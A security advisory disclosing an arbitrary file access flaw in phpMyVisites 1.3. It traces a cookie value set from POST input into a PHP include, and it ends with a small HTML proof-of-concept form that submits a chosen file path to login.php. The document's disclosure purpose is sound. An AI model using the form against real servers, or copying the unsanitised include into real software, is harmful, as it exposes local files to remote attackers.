  phpMyVisites Arbitrary File Access
------------------------------------------------------------------------

SUMMARY

" <http://www.phpmyvisites.net/> phpMyVisites is a free and powerful open
source application for websites statistics and audience measurements."

Due flaws in user data validation, a remote user can retrieve locally
stored files on the system phpMyVisites is running on.

DETAILS

Vulnerable Systems:
 * phpMyVisites version 1.3

Vulnerable code in file include/set_lang.php line 94:
include "./langs/".$lang['default_lang'];

assuming, $lang['default_lang'] was set on line 66:
$lang['default_lang'] = $_COOKIE[$nomcookielg];

line 40:
setcookie($nomcookielg, $_POST['mylang'], time()+3600*24*365*10);

Now, its possible to spoof the value of $_POST['mylang'] and point it to
any file we desire.

Exploit:
The following HTML code can be used to test the installation of
phpMyVisites for the vulnerability:
< form action="http://[pathtoyourphpMyVisites]/login.php" method="POST">
    Local file: < input type="text" name="mylang" value="" />
    < input type="submit" value="Alexx says RELAX!">
</form>
